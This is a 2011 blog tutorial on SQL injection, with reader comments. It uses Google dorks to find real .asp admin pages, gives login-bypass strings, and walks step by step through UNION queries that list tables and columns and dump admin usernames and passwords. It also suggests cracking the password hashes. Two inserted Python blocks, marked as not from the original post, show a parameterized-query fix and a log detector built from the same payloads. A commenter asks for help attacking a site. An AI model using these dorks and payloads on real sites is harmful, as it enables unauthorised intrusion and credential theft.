SQL Injection | Basic and Detailed Tutorial.

What is SQL injection?

SQL (Structured Query Language) injection or insertion is an attack technique that exploits a vulnerability in a web application that communicates with the server's database. The attack succeeds when the application fails to validate user-supplied input before placing it in the SQL statements it sends to the database, thereby allowing the attacker to gain control of all database resources.
Lastly, I would like to mention that it is an application-level vulnerability that is exploited, rather than a vulnerability on the server or database side.
I recommend that readers proceed with this post only if they abide by the blog's Disclaimer; otherwise, leave this page immediately.
Basic SQL Injection:
.asp-based websites are basically more vulnerable to this type of attack, so we can use Google dorks to find a few sites.

"inurl:admin.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:administratorlogin.asp"
"inurl:administrator_login.asp"

and many more here.

Bypassing the Login Screen:
Now that we have arrived at the administration page, we enter "admin", admin'--, admin'# or admin'/* in the username field and one of the SQL injection strings below in the password field.

' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
and many more.
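The bypass strings above only work because the application splices the username and password straight into the SQL text. As an added example (not code from the original post), the following Python/sqlite3 snippet puts that vulnerable pattern next to the parameterized query that defeats it; the users table and its credentials are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample database (not from the original post)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """The flaw the bypass strings rely on: input is spliced into the SQL text,
    so a quote plus a comment marker rewrites the WHERE clause."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Hardened form: placeholders send the input as data, so a quote stays a quote."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run the tutorial's strings against both versions; returns {label: (vuln, safe)}."""
    db = make_db()
    attempts = {
        "valid login": ("admin", "s3cret"),
        "admin'-- / anything": ("admin'--", "wrong"),
        "admin / ' or 1=1--": ("admin", "' or 1=1--"),
    }
    return {label: (login_vulnerable(db, u, p), login_parameterized(db, u, p))
            for label, (u, p) in attempts.items()}


if __name__ == "__main__":
    for label, (vuln, safe) in demo().items():
        print(f"{label:22} vulnerable -> {vuln!r:10} parameterized -> {safe!r}")
```

With the parameterized query the same strings simply fail to match any row, which is the fix the "Bypassing the Login Screen" step depends on being absent.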

Extended SQL Injection:

1. Concept behind error messages

a. E.g.: http://www.website.com/index.php?id=49'

b. A ' needs to be added after the digit 49.

c. An error message like the one shown below proves that the site is vulnerable to SQL injection.
d. If nothing is shown, then it is vulnerable to "Blind SQL injection".

2. Now we need to find the number of columns in the query's result by using "ORDER BY".
As we got an error at "10", the number of columns is "9".

3. Now we need to find the most vulnerable column by using "UNION".

http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,9--

a. Look out for some random number on the screen, as shown below.

b. The dash "-" is compulsory: use (id=-32) instead of (id=32).

c. Now, if this displays an error or a blank page, just move on to the next site.

d. If it displays a couple of numbers on the page, congrats! The site is vulnerable.

4. Now we need to find the version of the site's SQL database.
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,@@version--

Injection for VERSION 4:

If you get version 4 from the above step, then it will be a bit difficult, as we have to guess the table and column names. There we have to fall back on hit-and-trial methods, and the chance of success is very limited.


Injection for VERSION 5 and above:

1. Now we need to find the tables through the vulnerable column found above.

a. Table names are always listed in the information_schema.tables table of the information_schema database. So to extract the tables from it, the query is as below.
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,table_name from information_schema.tables where table_schema=database()

b. The most vulnerable column is 9, so we have put table_name in place of 9.

c. It will only show the first table name, the one lying at the top of the database. To show all the tables, the "group_concat(table_name)" function is used.

d. http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema=database()

OR
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables
e. We got cms_comments, cms_docs, cms_user etc. as tables.

2. Now we need to find the columns of the desired table. Here it is cms_user.

a. The input string needs to be converted into its decimal ASCII equivalent in order to pass it to the database.

b. You may use (http://easycalculation.com/ascii-hex.php) to convert any string to its decimal ASCII equivalent, or you can also use a Firefox add-on.
c. With cms_user as input, the ASCII values are 99 109 115 95 117 115 101 114.

d. http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(column_name) from information_schema.columns where table_name=char(99,109,115,95,117,115,101,114) is the modified query (the values are separated by commas inside char()).

e. "group_concat" is used to list all the columns, and since we are concerned with columns, "information_schema.columns" is used instead of "information_schema.tables".
f. Here we got id, c_name, f_name as the columns of the table cms_user.

g. In order to retrieve the data, group_concat(column_name) needs to be replaced with group_concat(id,0x3a,c_name,0x3a,f_name) from cms_user. Here "0x3a" is just the colon, which separates the contents we retrieve.
http://www.website.com/news.php?id=-49 union all select 1,2,3,4,5,6,7,8,group_concat(id,0x3a,c_name,0x3a,f_name) from cms_user

*So all ids, c_name values and f_name values appear on the screen. Similarly, if you get the admin table and find columns such as admin_name and password, then you have to write the query as group_concat(admin_name,0x3a,password) from admin, where
admin_name and password are the columns and admin is the table name.

*If the password is in encrypted form, then we have to use tools like John the Ripper or Cain & Abel, or if it is MD5 or another hash we may use one of the online decrypters you can find through Google. You may use the list of online decrypters I have provided here.
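The probe sequence described above (the quote test, ORDER BY counting, UNION SELECT with @@version, then information_schema and group_concat) leaves a recognisable trail in the web server's access log. As an added example (not code from the original post), the following Python script URL-decodes request paths from combined-format log lines and flags that sequence; the log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# One signature per probe the tutorial walks through: quote test, ORDER BY counting,
# UNION SELECT, version/schema enumeration, group_concat, login tautology, comment tail.
SIGNATURES = {
    "quote_probe": re.compile(r"=\d+'(\s|&|$)"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "tautology": re.compile(r"'\)?\s*or\s*\(?\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "comment_tail": re.compile(r"(--|/\*)\s*$"),
}
# Combined-format access log line; only client IP, request path and status are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def scan_line(line):
    """Decode the request path and return ip/status/path/hits, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = re.sub(r"\s+", " ", unquote_plus(m.group("path")))  # %27 -> ', + -> space
    hits = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    return {"ip": m.group("ip"), "status": m.group("status"), "path": path, "hits": hits}

def scan(lines):
    """Keep only requests that matched at least one signature."""
    return [r for r in (scan_line(l) for l in lines) if r and r["hits"]]

def hits_by_ip(results):
    """Count flagged requests per client; a source with several probes is the one to triage."""
    counts = {}
    for r in results:
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts

# Constructed sample log (RFC 5737 test addresses) modelled on the tutorial's probe sequence.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jan/2011:10:02:11 +0000] "GET /news.php?id=49%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Jan/2011:10:02:40 +0000] "GET /news.php?id=49+order+by+10-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Jan/2011:10:03:02 +0000] "GET /news.php?id=-49+union+all+select+1,2,3,4,5,6,7,8,@@version-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Jan/2011:10:03:30 +0000] "GET /news.php?id=-49+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name)+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Jan/2011:10:05:00 +0000] "GET /news.php?id=49 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Jan/2011:10:06:12 +0000] "POST /adminlogin.asp?user=admin%27--&pass=%27+or+1%3D1-- HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["status"], ",".join(r["hits"]), r["path"])
    print(hits_by_ip(scan(SAMPLE_LOG)))
```

The 500 responses on the first two probes followed by 200s on the UNION queries are the same "error, then numbers on the page" signal the tutorial looks for, now read from the defender's side.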


Few important points:

1. Instead of --, we can put /* or even nothing in the above statements.

2. In order to find the version of the database we can use @@version or version(), and we may use user() and database() to check the database user and name.

3. "0x3a" is used as the separator for the retrieved data; it is only a colon.

4. A "'" needs to be added in order to check for the vulnerability; if nothing is shown, then it may be a case of "Blind SQL Injection".

By: Chintan Gurjar; edited and updated by Satyajit Das (Admin).

About Chintan Gurjar: He is an ethical hacking enthusiast and a final-year B.Tech student from Ahmedabad, India, and a nice person; you can catch him here.
Reviewed by Satyajit (Admin, a.k.a. Satosys) on Monday, January 17, 2011.

12 comments:

Ganesh Babu said...

Nowadays PHP is getting lots of security by default; some of the security issues are not working, like bypassing the login screen, etc.

Praveen@Techperk said...

You are the real techie, maybe I will use you one day brother :)

Rohit Batra said...

Excellent illustration of SQL Injection... you cleared out some of my doubts.

Rajiv Vapor said...

This shows best technical knowledge, & these pitfalls on web pages are used, best example of sql injection hopes for knowledgeable information.

prateek sharma said...

thank you very much dear,

nice job

gagan said...

It's explained in a very good way, in depth ...

Arjun said...

Thanks for explaining with Demo images, this will make clear about the SQL Injection.

Scott Adams said...

I heard that SQL injection is being used by internet marketers and webmasters. I wonder how they do it.

Kolači said...

Cool tut. I can get until the step where I have to find a table name; then nothing shows. I think the DB is Sybase because the version of the database is 9.0.2.2451. Can you help me please?

Rajesh Namase said...

Very resourceful article, thanks for posting. I learned new thing today.

Voltures of USA said...

Wow, I like this lesson,
very organised articles.
Thanks

Anonymous said...

Data logging

This is a very helpful blog for me; I am very thankful for this blog.
